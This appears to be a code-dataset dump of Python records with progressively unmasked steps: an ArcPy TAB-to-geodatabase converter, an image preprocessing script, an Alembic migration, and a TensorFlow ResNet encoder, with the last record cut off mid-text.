file_to_copy)\n copy(file_to_copy, similar_output_folder)\n\nfor folder in remove_list:\n output_folders.pop(folder, None)\n\noutput_folders.pop('', None)\n\n\n\nmsg(\"\\nСоздание баз данных...\")\nfor output_subfolders in output_folders:\n mdb_name = basename(output_subfolders)\n mdb_local_path = join(output_subfolders, mdb_name + \".mdb\")\n\n if enable_rewrite_databases == 'true':\n a.Delete_management(join(output_folder, output_subfolders, mdb_name + \".mdb\"))\n\n try:\n a.CreatePersonalGDB_management(join(output_folder, output_subfolders), mdb_name + \".mdb\")\n msg(\" \" + mdb_local_path)\n except a.ExecuteError:\n warning(\" \" + mdb_local_path)\n\n\n\nmsg(\"\\nКонвертация TAB в слои...\")\nlayer_types = ['Line', 'NoGeometry', 'Point', 'Polygon', 'Text']\n\nfor subfolders in output_folders:\n tab_files = [tab_file for tab_file in get_files(join(input_folder, subfolders, \"*.TAB\"))]\n for tab_file_path in tab_files:\n for layer_type in layer_types:\n tab_name = basename(tab_file_path).replace('.TAB', '')\n layer_from_name = tab_name + ' ' + layer_type\n layer_from = join(tab_file_path, layer_from_name)\n\n a.Exists(layer_from)\n\n if not a.Exists(layer_from):\n continue\n\n layer_to_name = layer_from_name.replace(' ', '_')\n if layer_to_name[0].isdigit():\n layer_to_name = 'L' + layer_to_name\n layer_to = join(output_folder, subfolders, basename(subfolders) + '.mdb', layer_to_name)\n local_tab_path = join(subfolders, tab_name + '.TAB')\n if a.Exists(layer_to) and enable_rewrite_tabs == 'true':\n a.Delete_management(layer_to)\n msg(u' ' + local_tab_path + ' ' + layer_type)\n elif a.Exists(layer_to):\n warning(u' ' + local_tab_path + ' ' + layer_type)\n continue\n elif not a.Exists(layer_to):\n msg(u' ' + local_tab_path + ' ' + layer_type)\n\n try:\n a.CopyFeatures_management(layer_from, layer_to)\n except:\n try:\n a.CopyRows_management(layer_from, layer_to)\n except Exception as e:\n error(' Ошибка. Копирование объектов/строк не сработало:' + str(e))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import numpy as np
import torch
from timm.data.transforms_factory import transforms_imagenet_eval
from torchvision import transforms
from PIL import Image
def preprocess(args, src_path, save_path):
if isinstance(args.input_size, tuple):
img_size = args.input_size[-2:]
else:
img_size = args.input_size
preprocesser = transforms_imagenet_eval(
img_size,
interpolation=args.interpolation,
use_prefetcher=args.use_prefetcher,
mean=args.mean,
std=args.std,
crop_pct=args.crop_pct)
i = 0
in_files = os.listdir(src_path)
for file in in_files:
i = i + 1
print(file, "===", i)
input_image = Image.open(src_path + file).convert('RGB')
input_tensor = preprocesser(input_image)
img = np.array(input_tensor).astype(np.float32)
img = (img - np.array([x * 255 for x in args.mean]).reshape(3, 1, 1)) / np.array(
[x * 255 for x in args.std]).reshape(3, 1, 1)
img = img.astype(np.float32)
img.tofile(os.path.join(save_path, file.split('.')[0] + ".bin"))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--src_path', default='', type=str)
parser.add_argument('--save_path', default='', type=str)
parser.add_argument('--interpolation', default='bicubic', type=str, metavar='NAME',
help='Image resize interpolation type (overrides model)')
parser.add_argument('use_prefetcher', action='store_true', default=True,
help='enable fast prefetcher')
parser.add_argument('--crop-pct', default=0.9, type=float,
metavar='N', help='Input image center crop percent (for validation only)')
args = parser.parse_args()
args.mean = (0.485, 0.456, 0.406)
args.std = (0.229, 0.224, 0.225)
args.input_size = (3, 224, 224)
if not os.path.exists(args.save_path):
os.makedirs(args.save_path)
preprocess(args, args.src_path, args.save_path)
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "443ed24ab396e83dbf12558207376258124bca8b",
"index": 4094,
"step-1": "<mask token>\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str,\n metavar='NAME', help=\n 'Image resize interpolation type (overrides model)')\n parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',\n help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = 0.485, 0.456, 0.406\n args.std = 0.229, 0.224, 0.225\n args.input_size = 3, 224, 224\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n preprocess(args, args.src_path, args.save_path)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef preprocess(args, src_path, save_path):\n if isinstance(args.input_size, tuple):\n img_size = args.input_size[-2:]\n else:\n img_size = args.input_size\n preprocesser = transforms_imagenet_eval(img_size, interpolation=args.\n interpolation, use_prefetcher=args.use_prefetcher, mean=args.mean,\n std=args.std, crop_pct=args.crop_pct)\n i = 0\n in_files = os.listdir(src_path)\n for file in in_files:\n i = i + 1\n print(file, '===', i)\n input_image = Image.open(src_path + file).convert('RGB')\n input_tensor = preprocesser(input_image)\n img = np.array(input_tensor).astype(np.float32)\n img = (img - np.array([(x * 255) for x in args.mean]).reshape(3, 1, 1)\n ) / np.array([(x * 255) for x in args.std]).reshape(3, 1, 1)\n img = img.astype(np.float32)\n img.tofile(os.path.join(save_path, file.split('.')[0] + '.bin'))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str,\n metavar='NAME', help=\n 'Image resize interpolation type (overrides model)')\n parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',\n help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = 0.485, 0.456, 0.406\n args.std = 0.229, 0.224, 0.225\n args.input_size = 3, 224, 224\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n preprocess(args, args.src_path, args.save_path)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef preprocess(args, src_path, save_path):\n if isinstance(args.input_size, tuple):\n img_size = args.input_size[-2:]\n else:\n img_size = args.input_size\n preprocesser = transforms_imagenet_eval(img_size, interpolation=args.\n interpolation, use_prefetcher=args.use_prefetcher, mean=args.mean,\n std=args.std, crop_pct=args.crop_pct)\n i = 0\n in_files = os.listdir(src_path)\n for file in in_files:\n i = i + 1\n print(file, '===', i)\n input_image = Image.open(src_path + file).convert('RGB')\n input_tensor = preprocesser(input_image)\n img = np.array(input_tensor).astype(np.float32)\n img = (img - np.array([(x * 255) for x in args.mean]).reshape(3, 1, 1)\n ) / np.array([(x * 255) for x in args.std]).reshape(3, 1, 1)\n img = img.astype(np.float32)\n img.tofile(os.path.join(save_path, file.split('.')[0] + '.bin'))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str,\n metavar='NAME', help=\n 'Image resize interpolation type (overrides model)')\n parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',\n help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = 0.485, 0.456, 0.406\n args.std = 0.229, 0.224, 0.225\n args.input_size = 3, 224, 224\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n preprocess(args, args.src_path, args.save_path)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import argparse\nimport os\nimport numpy as np\nimport torch\nfrom timm.data.transforms_factory import transforms_imagenet_eval\nfrom torchvision import transforms\nfrom PIL import Image\n\n\ndef preprocess(args, src_path, save_path):\n if isinstance(args.input_size, tuple):\n img_size = args.input_size[-2:]\n else:\n img_size = args.input_size\n preprocesser = transforms_imagenet_eval(img_size, interpolation=args.\n interpolation, use_prefetcher=args.use_prefetcher, mean=args.mean,\n std=args.std, crop_pct=args.crop_pct)\n i = 0\n in_files = os.listdir(src_path)\n for file in in_files:\n i = i + 1\n print(file, '===', i)\n input_image = Image.open(src_path + file).convert('RGB')\n input_tensor = preprocesser(input_image)\n img = np.array(input_tensor).astype(np.float32)\n img = (img - np.array([(x * 255) for x in args.mean]).reshape(3, 1, 1)\n ) / np.array([(x * 255) for x in args.std]).reshape(3, 1, 1)\n img = img.astype(np.float32)\n img.tofile(os.path.join(save_path, file.split('.')[0] + '.bin'))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str,\n metavar='NAME', help=\n 'Image resize interpolation type (overrides model)')\n parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',\n help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = 0.485, 0.456, 0.406\n args.std = 0.229, 0.224, 0.225\n args.input_size = 3, 224, 224\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n preprocess(args, args.src_path, args.save_path)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport os\nimport numpy as np\n\nimport torch\nfrom timm.data.transforms_factory import transforms_imagenet_eval\nfrom torchvision import transforms\nfrom PIL import Image\n\n\ndef preprocess(args, src_path, save_path):\n if isinstance(args.input_size, tuple):\n img_size = args.input_size[-2:]\n else:\n img_size = args.input_size\n\n preprocesser = transforms_imagenet_eval(\n img_size,\n interpolation=args.interpolation,\n use_prefetcher=args.use_prefetcher,\n mean=args.mean,\n std=args.std,\n crop_pct=args.crop_pct)\n\n i = 0\n in_files = os.listdir(src_path)\n for file in in_files:\n i = i + 1\n print(file, \"===\", i)\n input_image = Image.open(src_path + file).convert('RGB')\n input_tensor = preprocesser(input_image)\n img = np.array(input_tensor).astype(np.float32)\n img = (img - np.array([x * 255 for x in args.mean]).reshape(3, 1, 1)) / np.array(\n [x * 255 for x in args.std]).reshape(3, 1, 1)\n img = img.astype(np.float32)\n img.tofile(os.path.join(save_path, file.split('.')[0] + \".bin\"))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str, metavar='NAME',\n help='Image resize interpolation type (overrides model)')\n parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float,\n metavar='N', help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = (0.485, 0.456, 0.406)\n args.std = (0.229, 0.224, 0.225)\n args.input_size = (3, 224, 224)\n\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n\n preprocess(args, args.src_path, args.save_path)\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
"""empty message
Revision ID: 42cf7f6532dd
Revises: e6d4ac8564fb
Create Date: 2019-04-01 16:13:37.207305
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '42cf7f6532dd'
down_revision = 'e6d4ac8564fb'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('stakeholder', sa.Column('archived', sa.Boolean(), nullable=False, default=False, server_default="false"))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('stakeholder', 'archived')
# ### end Alembic commands ###
|
normal
|
{
"blob_id": "42d9f40dd50056b1c258508a6cb3f9875680276a",
"index": 3393,
"step-1": "<mask token>\n\n\ndef downgrade():\n op.drop_column('stakeholder', 'archived')\n",
"step-2": "<mask token>\n\n\ndef upgrade():\n op.add_column('stakeholder', sa.Column('archived', sa.Boolean(),\n nullable=False, default=False, server_default='false'))\n\n\ndef downgrade():\n op.drop_column('stakeholder', 'archived')\n",
"step-3": "<mask token>\nrevision = '42cf7f6532dd'\ndown_revision = 'e6d4ac8564fb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column('stakeholder', sa.Column('archived', sa.Boolean(),\n nullable=False, default=False, server_default='false'))\n\n\ndef downgrade():\n op.drop_column('stakeholder', 'archived')\n",
"step-4": "<mask token>\nfrom alembic import op\nimport sqlalchemy as sa\nrevision = '42cf7f6532dd'\ndown_revision = 'e6d4ac8564fb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column('stakeholder', sa.Column('archived', sa.Boolean(),\n nullable=False, default=False, server_default='false'))\n\n\ndef downgrade():\n op.drop_column('stakeholder', 'archived')\n",
"step-5": "\"\"\"empty message\n\nRevision ID: 42cf7f6532dd\nRevises: e6d4ac8564fb\nCreate Date: 2019-04-01 16:13:37.207305\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '42cf7f6532dd'\ndown_revision = 'e6d4ac8564fb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('stakeholder', sa.Column('archived', sa.Boolean(), nullable=False, default=False, server_default=\"false\"))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('stakeholder', 'archived')\n # ### end Alembic commands ###\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from __future__ import absolute_import, print_function, division, unicode_literals
import tensorflow as tf
def get_encoder(conf):
if conf.encoder == 'linear':
model = tf.keras.Sequential([tf.keras.layers.Dense(conf.d_model * 2),
tf.keras.layers.ReLU(),
tf.keras.layers.Dense(conf.d_model)])
return model
if conf.encoder == 'rand_linear':
model = get_stochastic_linear(conf)
return model
if conf.encoder[:5] == 'cifar':
model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1, k=conf.k, linear=conf.linear)
return model
def get_stochastic_linear(conf):
model = tf.keras.Sequential([tf.keras.layers.GaussianNoise(.3),
tf.keras.layers.Dense(conf.d_model * 2),
tf.keras.layers.ReLU(),
tf.keras.layers.GaussianNoise(.3),
tf.keras.layers.Dense(conf.d_model)])
return model
# noinspection PyAbstractClass
class BasicBlock(tf.keras.layers.Layer):
EXPANSION = 1
def __init__(self, channels, filters, strides=1):
super().__init__()
self.conv_1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3, strides=strides, padding='same',
use_bias=False)
self.bn_1 = tf.keras.layers.BatchNormalization()
self.conv_2 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3, strides=1, padding='same',
use_bias=False)
self.bn_2 = tf.keras.layers.BatchNormalization()
self.shortcut = tf.keras.Sequential()
if strides != 1 or channels != (filters * self.EXPANSION):
self.shortcut.add(tf.keras.layers.Conv2D(filters=self.EXPANSION * filters, kernel_size=1, strides=strides,
use_bias=False))
self.shortcut.add(tf.keras.layers.BatchNormalization())
def call(self, inputs, training=True, mask=None):
x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training), training=training))
x = self.bn_2(self.conv_2(x, training=training), training=training)
x += self.shortcut(inputs, training=training)
return tf.nn.relu(x)
# noinspection PyAbstractClass
class ResNet(tf.keras.Model):
def __init__(self, block, num_blocks, pool_len=4, low_dim=128, width=1, k=10, linear=True):
super().__init__()
self.channels = 64
self.pool_len = pool_len
self.k = k
self.linear = linear
self.conv_1 = tf.keras.layers.Conv2D(filters=64, kernel_size=3, strides=1, padding='same', use_bias=False)
self.bn_1 = tf.keras.layers.BatchNormalization()
self.base = int(64 * width)
self.residual = tf.keras.Sequential([
self._make_layer(block, self.base, num_blocks[0], stride=1),
self._make_layer(block, self.base * 2, num_blocks[1], stride=2),
self._make_layer(block, self.base * 4, num_blocks[2], stride=2),
self._make_layer(block, self.base * 8, num_blocks[3], stride=2)
])
if self.linear:
self.fc = tf.keras.layers.Dense(low_dim)
self.pool = tf.keras.layers.AveragePooling2D(pool_len, pool_len, data_format='channels_last')
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1] * (num_blocks - 1)
layers = []
for stride in strides:
layers.append(block(self.channels, planes, stride))
self.channels = planes * block.EXPANSION
return tf.keras.Sequential(layers)
def call(self, inputs, training=True, mask=None):
x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training), training=training))
x = self.residual(x, training=training)
x = self.pool(x)
batch_size = tf.shape(x)[0]
x = tf.reshape(x, [batch_size, -1])
if self.linear:
x = self.fc(x, training=training)
return x
def test_resnet():
model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1)
a = tf.ones([7, 32, 32, 3])
b = model(a)
print(b)
if __name__ == '__main__':
test_resnet()
|
normal
|
{
"blob_id": "548eebb9628374df320021c714454e05d2c606c0",
"index": 5336,
"step-1": "<mask token>\n\n\ndef get_encoder(conf):\n if conf.encoder == 'linear':\n model = tf.keras.Sequential([tf.keras.layers.Dense(conf.d_model * 2\n ), tf.keras.layers.ReLU(), tf.keras.layers.Dense(conf.d_model)])\n return model\n if conf.encoder == 'rand_linear':\n model = get_stochastic_linear(conf)\n return model\n if conf.encoder[:5] == 'cifar':\n model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1, k\n =conf.k, linear=conf.linear)\n return model\n\n\n<mask token>\n\n\nclass BasicBlock(tf.keras.layers.Layer):\n EXPANSION = 1\n\n def __init__(self, channels, filters, strides=1):\n super().__init__()\n self.conv_1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3,\n strides=strides, padding='same', use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n self.conv_2 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3,\n strides=1, padding='same', use_bias=False)\n self.bn_2 = tf.keras.layers.BatchNormalization()\n self.shortcut = tf.keras.Sequential()\n if strides != 1 or channels != filters * self.EXPANSION:\n self.shortcut.add(tf.keras.layers.Conv2D(filters=self.EXPANSION *\n filters, kernel_size=1, strides=strides, use_bias=False))\n self.shortcut.add(tf.keras.layers.BatchNormalization())\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training),\n training=training))\n x = self.bn_2(self.conv_2(x, training=training), training=training)\n x += self.shortcut(inputs, training=training)\n return tf.nn.relu(x)\n\n\nclass ResNet(tf.keras.Model):\n\n def __init__(self, block, num_blocks, pool_len=4, low_dim=128, width=1,\n k=10, linear=True):\n super().__init__()\n self.channels = 64\n self.pool_len = pool_len\n self.k = k\n self.linear = linear\n self.conv_1 = tf.keras.layers.Conv2D(filters=64, kernel_size=3,\n strides=1, padding='same', use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n self.base = int(64 * width)\n self.residual = tf.keras.Sequential([self._make_layer(block, self.\n base, num_blocks[0], stride=1), self._make_layer(block, self.\n base * 2, num_blocks[1], stride=2), self._make_layer(block, \n self.base * 4, num_blocks[2], stride=2), self._make_layer(block,\n self.base * 8, num_blocks[3], stride=2)])\n if self.linear:\n self.fc = tf.keras.layers.Dense(low_dim)\n self.pool = tf.keras.layers.AveragePooling2D(pool_len, pool_len,\n data_format='channels_last')\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1)\n layers = []\n for stride in strides:\n layers.append(block(self.channels, planes, stride))\n self.channels = planes * block.EXPANSION\n return tf.keras.Sequential(layers)\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training),\n training=training))\n x = self.residual(x, training=training)\n x = self.pool(x)\n batch_size = tf.shape(x)[0]\n x = tf.reshape(x, [batch_size, -1])\n if self.linear:\n x = self.fc(x, training=training)\n return x\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_encoder(conf):\n if conf.encoder == 'linear':\n model = tf.keras.Sequential([tf.keras.layers.Dense(conf.d_model * 2\n ), tf.keras.layers.ReLU(), tf.keras.layers.Dense(conf.d_model)])\n return model\n if conf.encoder == 'rand_linear':\n model = get_stochastic_linear(conf)\n return model\n if conf.encoder[:5] == 'cifar':\n model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1, k\n =conf.k, linear=conf.linear)\n return model\n\n\n<mask token>\n\n\nclass BasicBlock(tf.keras.layers.Layer):\n EXPANSION = 1\n\n def __init__(self, channels, filters, strides=1):\n super().__init__()\n self.conv_1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3,\n strides=strides, padding='same', use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n self.conv_2 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3,\n strides=1, padding='same', use_bias=False)\n self.bn_2 = tf.keras.layers.BatchNormalization()\n self.shortcut = tf.keras.Sequential()\n if strides != 1 or channels != filters * self.EXPANSION:\n self.shortcut.add(tf.keras.layers.Conv2D(filters=self.EXPANSION *\n filters, kernel_size=1, strides=strides, use_bias=False))\n self.shortcut.add(tf.keras.layers.BatchNormalization())\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training),\n training=training))\n x = self.bn_2(self.conv_2(x, training=training), training=training)\n x += self.shortcut(inputs, training=training)\n return tf.nn.relu(x)\n\n\nclass ResNet(tf.keras.Model):\n\n def __init__(self, block, num_blocks, pool_len=4, low_dim=128, width=1,\n k=10, linear=True):\n super().__init__()\n self.channels = 64\n self.pool_len = pool_len\n self.k = k\n self.linear = linear\n self.conv_1 = tf.keras.layers.Conv2D(filters=64, kernel_size=3,\n strides=1, padding='same', use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n self.base = int(64 * width)\n self.residual = tf.keras.Sequential([self._make_layer(block, self.\n base, num_blocks[0], stride=1), self._make_layer(block, self.\n base * 2, num_blocks[1], stride=2), self._make_layer(block, \n self.base * 4, num_blocks[2], stride=2), self._make_layer(block,\n self.base * 8, num_blocks[3], stride=2)])\n if self.linear:\n self.fc = tf.keras.layers.Dense(low_dim)\n self.pool = tf.keras.layers.AveragePooling2D(pool_len, pool_len,\n data_format='channels_last')\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1)\n layers = []\n for stride in strides:\n layers.append(block(self.channels, planes, stride))\n self.channels = planes * block.EXPANSION\n return tf.keras.Sequential(layers)\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training),\n training=training))\n x = self.residual(x, training=training)\n x = self.pool(x)\n batch_size = tf.shape(x)[0]\n x = tf.reshape(x, [batch_size, -1])\n if self.linear:\n x = self.fc(x, training=training)\n return x\n\n\ndef test_resnet():\n model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1)\n a = tf.ones([7, 32, 32, 3])\n b = model(a)\n print(b)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_encoder(conf):\n if conf.encoder == 'linear':\n model = tf.keras.Sequential([tf.keras.layers.Dense(conf.d_model * 2\n ), tf.keras.layers.ReLU(), tf.keras.layers.Dense(conf.d_model)])\n return model\n if conf.encoder == 'rand_linear':\n model = get_stochastic_linear(conf)\n return model\n if conf.encoder[:5] == 'cifar':\n model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1, k\n =conf.k, linear=conf.linear)\n return model\n\n\ndef get_stochastic_linear(conf):\n model = tf.keras.Sequential([tf.keras.layers.GaussianNoise(0.3), tf.\n keras.layers.Dense(conf.d_model * 2), tf.keras.layers.ReLU(), tf.\n keras.layers.GaussianNoise(0.3), tf.keras.layers.Dense(conf.d_model)])\n return model\n\n\nclass BasicBlock(tf.keras.layers.Layer):\n EXPANSION = 1\n\n def __init__(self, channels, filters, strides=1):\n super().__init__()\n self.conv_1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3,\n strides=strides, padding='same', use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n self.conv_2 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3,\n strides=1, padding='same', use_bias=False)\n self.bn_2 = tf.keras.layers.BatchNormalization()\n self.shortcut = tf.keras.Sequential()\n if strides != 1 or channels != filters * self.EXPANSION:\n self.shortcut.add(tf.keras.layers.Conv2D(filters=self.EXPANSION *\n filters, kernel_size=1, strides=strides, use_bias=False))\n self.shortcut.add(tf.keras.layers.BatchNormalization())\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training),\n training=training))\n x = self.bn_2(self.conv_2(x, training=training), training=training)\n x += self.shortcut(inputs, training=training)\n return tf.nn.relu(x)\n\n\nclass ResNet(tf.keras.Model):\n\n def __init__(self, block, num_blocks, pool_len=4, low_dim=128, width=1,\n k=10, linear=True):\n super().__init__()\n self.channels = 64\n self.pool_len = pool_len\n self.k = k\n self.linear = linear\n self.conv_1 = tf.keras.layers.Conv2D(filters=64, kernel_size=3,\n strides=1, padding='same', use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n self.base = int(64 * width)\n self.residual = tf.keras.Sequential([self._make_layer(block, self.\n base, num_blocks[0], stride=1), self._make_layer(block, self.\n base * 2, num_blocks[1], stride=2), self._make_layer(block, \n self.base * 4, num_blocks[2], stride=2), self._make_layer(block,\n self.base * 8, num_blocks[3], stride=2)])\n if self.linear:\n self.fc = tf.keras.layers.Dense(low_dim)\n self.pool = tf.keras.layers.AveragePooling2D(pool_len, pool_len,\n data_format='channels_last')\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1)\n layers = []\n for stride in strides:\n layers.append(block(self.channels, planes, stride))\n self.channels = planes * block.EXPANSION\n return tf.keras.Sequential(layers)\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training),\n training=training))\n x = self.residual(x, training=training)\n x = self.pool(x)\n batch_size = tf.shape(x)[0]\n x = tf.reshape(x, [batch_size, -1])\n if self.linear:\n x = self.fc(x, training=training)\n return x\n\n\ndef test_resnet():\n model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1)\n a = tf.ones([7, 32, 32, 3])\n b = model(a)\n print(b)\n\n\nif __name__ == '__main__':\n test_resnet()\n",
"step-4": "from __future__ import absolute_import, print_function, division, unicode_literals\nimport tensorflow as tf\n\n\ndef get_encoder(conf):\n if conf.encoder == 'linear':\n model = tf.keras.Sequential([tf.keras.layers.Dense(conf.d_model * 2\n ), tf.keras.layers.ReLU(), tf.keras.layers.Dense(conf.d_model)])\n return model\n if conf.encoder == 'rand_linear':\n model = get_stochastic_linear(conf)\n return model\n if conf.encoder[:5] == 'cifar':\n model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1, k\n =conf.k, linear=conf.linear)\n return model\n\n\ndef get_stochastic_linear(conf):\n model = tf.keras.Sequential([tf.keras.layers.GaussianNoise(0.3), tf.\n keras.layers.Dense(conf.d_model * 2), tf.keras.layers.ReLU(), tf.\n keras.layers.GaussianNoise(0.3), tf.keras.layers.Dense(conf.d_model)])\n return model\n\n\nclass BasicBlock(tf.keras.layers.Layer):\n EXPANSION = 1\n\n def __init__(self, channels, filters, strides=1):\n super().__init__()\n self.conv_1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3,\n strides=strides, padding='same', use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n self.conv_2 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3,\n strides=1, padding='same', use_bias=False)\n self.bn_2 = tf.keras.layers.BatchNormalization()\n self.shortcut = tf.keras.Sequential()\n if strides != 1 or channels != filters * self.EXPANSION:\n self.shortcut.add(tf.keras.layers.Conv2D(filters=self.EXPANSION *\n filters, kernel_size=1, strides=strides, use_bias=False))\n self.shortcut.add(tf.keras.layers.BatchNormalization())\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training),\n training=training))\n x = self.bn_2(self.conv_2(x, training=training), training=training)\n x += self.shortcut(inputs, training=training)\n return tf.nn.relu(x)\n\n\nclass ResNet(tf.keras.Model):\n\n def __init__(self, block, num_blocks, pool_len=4, low_dim=128, width=1,\n k=10, linear=True):\n super().__init__()\n self.channels = 64\n self.pool_len = pool_len\n self.k = k\n self.linear = linear\n self.conv_1 = tf.keras.layers.Conv2D(filters=64, kernel_size=3,\n strides=1, padding='same', use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n self.base = int(64 * width)\n self.residual = tf.keras.Sequential([self._make_layer(block, self.\n base, num_blocks[0], stride=1), self._make_layer(block, self.\n base * 2, num_blocks[1], stride=2), self._make_layer(block, \n self.base * 4, num_blocks[2], stride=2), self._make_layer(block,\n self.base 